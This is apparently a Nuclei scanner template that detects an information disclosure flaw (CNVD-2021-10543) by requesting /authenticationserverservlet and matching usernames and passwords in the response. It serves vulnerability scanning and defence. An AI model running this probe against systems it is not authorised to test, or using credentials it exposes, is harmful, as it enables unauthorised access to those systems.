id: eea-disclosure

info:
  name: EEA Information Disclosure
  author: pikpikcu
  severity: high
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
  tags: config,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/authenticationserverservlet"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "<username>(.*?)</username>"
          - "<password>(.*?)</password>"
        condition: and

      - type: status
        status:
          - 200
